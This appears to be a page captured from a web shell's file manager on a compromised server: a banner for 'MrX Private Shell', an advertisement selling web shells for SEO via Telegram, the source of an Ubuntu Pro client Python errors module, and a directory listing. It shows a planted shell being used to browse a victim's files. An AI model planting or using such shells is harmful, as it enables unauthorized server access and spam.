__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
from uaclient import messages
from uaclient.api.errors import APIError
from uaclient.exceptions import (
AlreadyAttachedError,
ConnectivityError,
ContractAPIError,
DepedentOptionError,
EntitlementNotDisabledError,
EntitlementNotEnabledError,
EntitlementNotFoundError,
EntitlementsNotEnabledError,
FeatureNotSupportedOldTokenError,
IncompatibleServiceStopsEnable,
InvalidOptionCombination,
InvalidProImage,
LockHeldError,
MagicAttachTokenAlreadyActivated,
MagicAttachTokenError,
MagicAttachUnavailable,
NonAutoAttachImageError,
NonRootUserError,
RequiredServiceStopsEnable,
UbuntuProError,
UnattachedError,
UnsupportedManifestFile,
UrlError,
UserFacingError,
)
__all__ = [
"AlreadyAttachedError",
"ConnectivityError",
"ContractAPIError",
"EntitlementNotFoundError",
"InvalidOptionCombination",
"FeatureNotSupportedOldTokenError",
"InvalidProImage",
"LockHeldError",
"MagicAttachTokenAlreadyActivated",
"MagicAttachTokenError",
"MagicAttachUnavailable",
"NonAutoAttachImageError",
"NonRootUserError",
"UbuntuProError",
"UnattachedError",
"UrlError",
"UserFacingError",
"EntitlementsNotEnabledError",
"EntitlementNotEnabledError",
"EntitlementNotDisabledError",
"IncompatibleServiceStopsEnable",
"RequiredServiceStopsEnable",
"UnsupportedManifestFile",
"DepedentOptionError",
]
class AutoAttachDisabledError(UbuntuProError):
_msg = messages.E_AUTO_ATTACH_DISABLED_ERROR
class UnattendedUpgradesError(APIError):
_formatted_msg = messages.E_UNATTENDED_UPGRADES_ERROR
class NotSupported(UbuntuProError):
_msg = messages.E_NOT_SUPPORTED
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| __pycache__ | Folder | 0755 |
|
|
| u | Folder | 0755 |
|
|
| __init__.py | File | 2.26 KB | 0644 |
|
| api.py | File | 5.56 KB | 0644 |
|
| data_types.py | File | 1.91 KB | 0644 |
|
| errors.py | File | 1.96 KB | 0644 |
|
| exceptions.py | File | 1.7 KB | 0644 |
|